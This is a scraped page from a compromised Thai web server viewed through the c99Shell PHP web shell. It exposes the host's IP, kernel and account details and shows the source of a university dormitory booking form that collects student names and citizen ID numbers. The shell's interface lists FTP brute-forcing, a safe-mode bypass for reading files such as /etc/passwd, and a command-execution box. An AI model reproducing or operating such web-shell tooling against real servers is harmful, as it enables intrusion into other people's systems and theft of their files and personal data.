110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/mis2222/application/views/esa/ drwxr-xr-x Free 50.65 GB of 127.8 GB (39.63%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout


<?php
$row_std = isset($qu_std) ? $qu_std->row() : NULL;

$attributes = array('id' => 'myform', 'name' => 'myform');
echo form_open($this->config->item('sa_folder').$action.'/dmb_insert', $attributes);

$tmp = $this->input->post('dmb_dm_id');
?>

<script>
jQuery(document).ready(function(){
    change_dm();
});

function change_dm () {
    var dmId = jQuery("#dmId").val();
    var tmp_rm = '<?echo $tmp;?>';
    if(dmId!=""){
        var url = "<?php echo site_url($this->config->item('sa_folder'));?>/general/getDmRm/"+dmId;
        xmlhttp = newXmlHttp();
        xmlhttp.open("GET", url, false);
        xmlhttp.send(null);
        if (xmlhttp.readyState==4 && xmlhttp.status==200) {
            var ret_text = xmlhttp.responseText;
            document.getElementById('showDmRm').innerHTML= ret_text;
            if(tmp_rm!=''){
                jQuery("#dmb_dm_id").val(tmp_rm);
            }
        }
    }
}
</script>
<table width="100%" border="0" align="center">
<?php
    if (isset($qu_dmb)) {
?>
    <tr align="center">
        <td>ท่านได้จองหอพัก/ห้องพักแล้ว</td>
    </tr>
<?php
    } else {
?>
    <tr align="center">
        <th>จองหอพัก/ห้องพัก<br /><br /></th>
    </tr>
    <tr>
        <td><table class="szone2" width="100%" border="0">
            <tr>
                <td width="25%" class="szone">ข้าพเจ้า</td>
                <td>
<?php
                if (is_null($row_std)) {
?>
                <?php echo form_dropdown('dmb_pf_id', $rs_pf);?>
                <input type="text" id="dmb_name" name="dmb_name" value="<?php echo set_value('dmb_name');?>" size="10" maxlength="30" class="required-thai" />
                <input type="text" id="dmb_surname" name="dmb_surname" value="<?php echo set_value('dmb_surname');?>" size="10" maxlength="30" class="required-thai" />
                <span class="error">*<?php echo form_error('dmb_pf_id') ? form_error('dmb_pf_id') : (form_error('dmb_name') ? form_error('dmb_name') : form_error('dmb_surname'));?></span>
<?php
                } else {
                    echo getval('prefixName', $row_std).getval('stdName', $row_std).' '.getval('stdSurname', $row_std);
?>
                <input type="hidden" id="dmb_std_id" name="dmb_std_id" value="<?php echo getval('stdId', $row_std);?>" />
                <input type="hidden" id="dmb_pf_id" name="dmb_pf_id" value="<?php echo getval('stdPfId', $row_std);?>" />
                <input type="hidden" id="dmb_name" name="dmb_name" value="<?php echo getval('stdName', $row_std);?>" />
                <input type="hidden" id="dmb_surname" name="dmb_surname" value="<?php echo getval('stdSurname', $row_std);?>" />
<?php
                }
?>
                </td>
                <td class="szone">เลขที่บัตรประชาชน</td>
                <td>
<?php
                if (is_null($row_std)) {
?>
                <input type="text" id="dmb_citizen_id" name="dmb_citizen_id" value="<?php echo set_value('dmb_citizen_id');?>" size="13" maxlength="13" class="required-int" />
                <span class="error">* <?php echo form_error('dmb_citizen_id');?></span>
<?php
                } else {
                    echo getval('sdtCitizenId', $row_std);
?>
                <input type="hidden" id="dmb_citizen_id" name="dmb_citizen_id" value="<?php echo getval('sdtCitizenId', $row_std);?>" />
<?php
                }
?>
                </td>
            </tr>
            <tr>
                <td class="szone">หลักสูตร</td>
                <td colspan="3">
<?php
                if (is_null($row_std)) {
                    echo form_dropdown('dmb_cur_id', $rs_cur);
?>
                <span class="error">* <?php echo form_error('dmb_cur_id');?></span>
<?php
                } else {
                    echo getval('curName', $row_std);
?>
                <input type="hidden" id="dmb_cur_id" name="dmb_cur_id" value="<?php echo getval('stdCurId', $row_std);?>" />
<?php
                }
?>
                </td>
            </tr>
            <tr>
                <td class="szone">มีความประสงค์จะจองหอพัก</td>
                <td colspan="3">
<?php
                $js = "id=\"dmId\" onChange=\"change_dm()\"";
                echo form_dropdown('dftDmId', $rs_dm, setValue('dftDmId', $row_std), $js);
?>
                <span class="error">* <?php echo form_error('dftDmId');?></span></td>
            </tr>
            <tr>
                <td class="szone">ห้องพัก</td>
                <td colspan="3"><div id="showDmRm"></div>
                <span class="error"><?php echo form_error('dmb_dm_id');?></span></td>
            </tr>
            <tr>
                <td class="szone">ภาค/ปีการศึกษา</td>
                <td colspan="3"><?php echo $tmId;?>/<?php echo $acY;?>
                <input type="hidden" id="dmb_year" name="dmb_year" value="<?php echo $acY;?>" />
                <input type="hidden" id="dmb_tm_id" name="dmb_tm_id" value="<?php echo $tmId;?>" /></td>
            </tr>
            <tr>
                <td colspan="4" align="center">
                <input type="submit" name="add" id="add" value="บันทึก" />
                <input type="reset" name="clear" id="clear" value="เคียร์ข้อมูล" /></td>
        </table></td>
    </tr>
<?php
    }
?>
</table>
<?php echo form_close();?>

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Command execute ::
Enter:	Select: